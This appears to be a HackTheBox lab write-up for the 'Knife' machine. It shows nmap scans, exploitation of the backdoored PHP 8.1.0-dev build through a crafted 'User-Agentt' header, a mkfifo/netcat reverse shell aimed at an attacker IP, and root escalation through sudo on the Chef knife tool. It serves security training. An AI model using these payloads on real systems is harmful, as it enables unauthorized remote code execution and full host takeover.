Knife - [HTB]

Cover Image for Knife - [HTB]
Marmeus
Marmeus

Introduction

Knife is an easy Linux machine from HackTheBox where the attacker will obtain a reverse shell from a PHP backdoor getting he user flag. FInally, will have to use the tool knife in order to obtain a shell as root.

Enumeration

As always, let's start finding all opened ports in the machine with nmap.

kali@kali:~/Documents/HTB/Knife$ sudo nmap -sS -n -T5 -p- -oN AllPorts.txt 10.10.10.242
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-22 16:08 EDT
Warning: 10.10.10.242 giving up on port because retransmission cap hit (2).
Stats: 0:01:51 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 74.60% done; ETC: 16:11 (0:00:38 remaining)
Nmap scan report for 10.10.10.242
Host is up (0.11s latency).
Not shown: 65468 closed ports, 65 filtered ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 150.09 seconds

Then, we continue with a deeper scan of each opened port, getting more information about each service.

kali@kali:~/Documents/HTB/Knife$ sudo nmap -sC -sV -p22,80 -oN PortsDepth.txt 10.10.10.242
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-22 16:20 EDT
Nmap scan report for 10.10.10.242
Host is up (0.11s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
|   256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_  256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title:  Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.35 seconds

Taking a look at the web page technologies we can see that it uses PHP 8.1.0.

Knife web page

This version was famous because some cyber criminals inserted a BACKDOOR inside the php source code. You can reed the history here.

In order to check if this machine is vulnerable, you can internect and modify the request with burp, adding the header User-Agentt with the value zerodiumvar_dump(3*3);.

GET / HTTP/1.1
Host: knife.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 
User-Agentt: zerodiumvar_dump(3*3);

The result of the operation.

HTTP/1.1 200 OK
Date: Sat, 22 May 2021 22:00:46 GMT
Server: Apache/2.4.41 (Ubuntu)
X-Powered-By: PHP/8.1.0-dev
Vary: Accept-Encoding
Content-Length: 5825
Connection: close
Content-Type: text/html; charset=UTF-8

int(9)
<!DOCTYPE html>

Explotation

Because it is PHP we can use some functions in order to execute shell commands.

Request:

GET / HTTP/1.1
Host: knife.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
User-Agentt: zerodiumvar_dump(system("id"));

Response:

HTTP/1.1 200 OK
Date: Sat, 22 May 2021 22:09:43 GMT
Server: Apache/2.4.41 (Ubuntu)
X-Powered-By: PHP/8.1.0-dev
Vary: Accept-Encoding
Content-Length: 5930
Connection: close
Content-Type: text/html; charset=UTF-8

uid=1000(james) gid=1000(james) groups=1000(james)
string(50) "uid=1000(james) gid=1000(james) groups=1000(james)"
<!DOCTYPE html>

In order to obtain a reverse shell you need to use the following command, obtaining the user flag.

User-Agentt: zerodiumvar_dump(system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.15 8787 >/tmp/f"));

Privilege escalation

As we can see, we can execute the /usr/bin/knife file as root without password.

james@knife:~$ sudo -l
Matching Defaults entries for james on knife:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife

knife is a command-line tool written in ruby that provides an interface between a local chef-repo and the Chef Infra Server.

After reading the documentation, we can know how to execute commands on the victim machine. The command is the following.

james@knife:~$ sudo /usr/bin/knife exec -E "system('bash')" -s http://localhost/
root@knife:/home/james# cat /root/root.txt 
[CENSORED]